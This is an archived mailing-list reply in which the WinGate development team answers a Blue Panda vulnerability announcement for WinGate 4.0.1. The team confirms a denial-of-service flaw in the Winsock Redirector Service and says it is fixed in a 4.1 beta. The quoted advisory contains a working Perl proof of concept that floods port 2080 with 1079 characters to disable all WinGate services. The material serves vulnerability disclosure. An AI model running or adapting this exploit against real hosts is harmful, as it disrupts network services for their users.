Re: Wingate 4.0.1 denial-of-service

[Doug Kassuba <dkassuba () I2K NET>]

We used your information to analyse this weakness 
and  it was fixed for the next release, which will be the 
beta version of WinGate 4.1. This is currently 
available at http://wingate.deerfield.com/beta

For normal use it is not too serious a vulnerability as 
the Winsock 
Redirector Service is by default only bound to the 
local network adaptors 
and there is no point in binding it to public (internet) 
adaptors, meaning 
that the attack would have to be launched from within 
the LAN. GateKeeper 
will warn the operator when they bind the Winsock 
Redirector Service to a 
public adaptor.

WinGate Development Team


======================================
===========================
> Blue Panda Vulnerability Announcement: Wingate 
4.0.1
> 02/10/2000 (dd/mm/yyyy)
>
> bluepanda () dwarf box sk
> http://bluepanda.box.sk/
======================================
===========================
> Details available in attached file.
======================================
===========================
> Blue Panda Vulnerability Announcement: Wingate 
4.0.1
> 02/10/2000 (dd/mm/yyyy)
>
> bluepanda () dwarf box sk
> http://bluepanda.box.sk/
======================================
===========================
> Problem: The Wingate engine can be disabled by 
sending an abnormal string to
> the Winsock Redirecter Service. The attack is not 
logged.
> Vulnerable: Wingate Home/Standard/Pro 4.0.1, 
possible prior versions
> (untested).
>
> Immune: Wingate 4.1 Beta A
>
> Vendor status: Notified.
>
> ===================
> Proof of concept:
> ===================
>
> #!/usr/bin/perl
> #
> # wgate401.pl - Wingate 4.0.1 denial-of-service
> # Blue Panda - bluepanda () dwarf box sk
> # http://bluepanda.box.sk/
> #
> # ----------------------------------------------------------
> # Disclaimer: this file is intended as proof of 
concept, and
> # is not intended to be used for illegal purposes. I 
accept
> # no responsibility for damage incurred by the use 
of it.
> # ----------------------------------------------------------
> #
> # Causes all Wingate services to become 
unavailable until the Wingate Engine
> # is restarted. The Winsock Redirector Service 
must be enabled in order for
> # this to work. Tested on the evaluation version of 
Wingate Pro 4.0.1.
> #
>
> use IO::Socket;
>
> $host = "host.com";
> $port = "2080";
> $sleepfor = 1;
>
> print "Wingate 4.0.1 denial-of-service
> Blue Panda - bluepanda\@dwarf.box.sk
> http://bluepanda.box.sk/
>
> ----------------------------------------------------------
> Disclaimer: this file is intended as proof of concept, 
and
> is not intended to be used for illegal purposes. I 
accept
> no responsibility for damage incurred by the use of 
it.
> ----------------------------------------------------------
>
> Causes all Wingate services to become 
unavailable until the Wingate Engine
> is restarted. The Winsock Redirector Service must 
be enabled in order for
> this to work.\n\n";
>
> # Connect to the Winsock Redirector Service.
> print "Connecting to $host:$port...";
> $socket = IO::Socket::INET->new(Proto=>"tcp", 
PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
> print "done.\n";
>
> # Send some characters to the Winsock 
Redirector Service.
> $buffer = "a" x 1079;
> print $socket "$buffer";
>
> # Wait a few seconds.
> $counter = 0;
> print "Sleeping for $sleepfor seconds.";
> while($counter < $sleepfor) {
>         sleep(1);
>         print ".";
>         $counter += 1;
> }
> print "\n";
>
> # Close the connection. The Winsock Redirector 
Service should now be
> # disabled.
> close($socket);
>
> # Connect once more to the Winsock Redirector 
Service. This will disable all
> # other services.
> print "Connecting to $host:$port...";
> $socket = IO::Socket::INET->new(Proto=>"tcp", 
PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
> print "done.\n";
>
> # Finished.
> close($socket);